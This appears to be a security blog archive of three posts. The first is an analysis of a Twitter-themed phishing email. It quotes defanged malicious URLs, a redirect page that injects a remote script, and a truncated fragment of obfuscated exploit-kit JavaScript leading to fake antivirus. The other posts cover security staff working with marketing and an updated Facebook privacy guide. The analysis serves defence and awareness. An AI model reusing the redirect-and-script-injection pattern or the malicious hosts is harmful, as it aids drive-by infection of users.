Category Archives: Social Networks

Interesting New Twitter Phish Can Lead to Bad Places

0
Filed under Malware, Social Networks
Tagged as , , , ,

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. 🙂 Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404’s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

The Story of a Security Guy at the Marketing Conference

2
Filed under General Security, Social Networks
Tagged as , , , , , , ,

Last week I was asked by some of my social media acquaintances to be a panelist on a end of the day keynote at the Online Marketing Summit (OMS) held in Cleveland, OH.  The first thing you are probably wondering is “What the hell is a security guy doing at a marketing conference”?  Let me explain.  This isn’t the first time I have done something like this and it probably won’t be the last.  Read on.

In many companies the marketing, public relations, HR and other “business” functions really don’t want anything to do with security.  It’s true.  We always get in the way by stopping money making and/or great marketing ideas with phrases like “If you do that…the hax0rs are going to pwn us!” or “No you can’t, that’s against our security policy.  Go away now.”  Unfortunately, all it takes is one bad experience from the “security people” and they won’t want to work with you ever again.  I’ve seen it happen many times and I’ve even been “that evil security guy” at various times in my career.

It’s because of this bull headed attitude that these departments start finding ways around your policies, procedures, website blocking and more.  Why? Because security people are increasingly impossible to deal with.  Too much red tape, policies, rules and most of all…lack of communication.  That’s right, I said it.  Lack of good communication.  When was the last time you talked to these people in your company?  When was the last time you offered to help them with a compromise or solution rather then saying no?  This might be a shock to some of you but these are the people helping make the business money.  All of us in security are just an extra expense to the business.  Don’t make our jobs harder!  Here are three steps to help communicate to these people better:

1. Get out of your shell
We love to hang out and network at security conferences and user groups.  It makes sense because we are comfortable around our own people.  However, take a step back and think about what the “business needs” for a minute.  You are there to help the business succeed.  So go out and help them!  One way to do this is to attend a marketing conference.  Seriously.  You get to meet and talk to people that want to help the business make money and know how to do it.  You also get to learn what the business wants.  This will get you thinking about how you as the “security person” can help make that happen while keeping the business and its information safe.

2. Learn something new
What does marketing have to do with security?  All kinds of things!  SEO, blogging, social networking, social media, brand reputation, monitoring and more.  These are hot topics right now and there are serious security and privacy issues to be concidered.  You need to be involved!  The best way to do this is to attend their conferences, read their blogs and communicate.  One good way to get involved is to look for a local social media club in your area.  We have a great one in Cleveland and there are others in cities all over the US and probably the world.  Attend, learn and network.  It can only benefit you and your company.  Same goes if you are a consultant.  Meeting marketing people is a great way to get new business because they usually have a direct line to upper management at a company.  They will also be so impressed that a security person actually took the time to show up to a marketing conference…they might call upper management for you. 🙂

3. Teach and Educate
We have all “beaten the horse to death” regarding security awareness.  Many in security say it doesn’t work and is a hopeless battle.  While there is no patch for human stupidity, you still need to make an effort.  If anything, by you as the “security person” showing up at the marketing departments monthly meeting it shows that security wants to be involved with what they are doing.  This alone says volumes!  Especially to management of those groups.  Get out there and explain why you have certain policies, how the security team functions or better yet…how you can help them market the business and do it securely.

Facebook Privacy & Security Guide Updated to v2.2

0
Filed under Social Networks
Tagged as , , , ,

I have updated the Facebook Privacy & Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you’re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It’s free, printable and meant to be shared.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.